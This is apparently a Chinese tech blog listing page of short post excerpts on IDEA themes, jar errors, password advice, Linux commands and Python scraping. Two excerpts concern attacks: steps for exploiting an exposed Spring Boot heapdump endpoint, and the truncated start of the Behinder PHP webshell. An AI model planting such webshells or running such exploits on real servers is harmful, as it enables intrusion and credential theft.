
iDea安装material theme UI
Settings: 选择不使用material theme 的icon,太丑太难看,取消打勾使用默认 使用背景图片,设置透明度
Settings: 选择不使用material theme 的icon,太丑太难看,取消打勾使用默认 使用背景图片,设置透明度
编译java项目,build actifacts为jar后,运行jar报错: Error: Invalid or corrupt jarfile 解决办法: Make sure your MANIFEST.MF is in: src/mai...
《记录下》 针对建议: (1)使用多种字符组合的强密码,如大小写字母+数字+特殊字符; (2)用户密码中不要出现与用户名或者系统名相关的字符,如用户名@123、系统名123等; (3)不要使用系统默认初始密码;或设定在系统首次登录时,强制修...
https://github.com/LandGrey/SpringBootVulExploit 利用条件: 可正常 GET 请求目标 /heapdump 或 /actuator/heapdump 接口 利用方法: 步骤一: 找到想要获取的...
冰蝎默认php木马: <?php @error_reporting(0); session_start(); if (isset($_GET['pass'])) { $key=substr(md5(uniqid(rand())),16...
官网 https://wkhtmltopdf.org/ 各种语言版本 C#: https://github.com/codaxy/wkhtmltopdf https://github.com/tlbdk/WkHtmlToPdfRunner/...
linux常用命令 (1)文本倒序 Linux文本行倒序排列6种方法 1. 命令方法: nl filename | sort -nr | cut -f2 这个方法很unix风格,使用多命令组合完成某种功能是典型的unix特点 单命令: 在l...
Python爬虫,微信公众号文章采集工具 来源:https://zhuanlan.zhihu.com/p/111352875 #微信公众号文章采集 import requests from lxml import etree import ...
安装prettytable: pip install prettytable 测试对爬取数据的表格显示: #coding:utf8 import prettytable as pt def main(): tb = pt.Pr...
1、root默认没有密码,使用安装时设置的普通用户 sudo passwd root 进行密码设置 2、关机不能直接使用reboot,需要sudo reboot即可 3、待续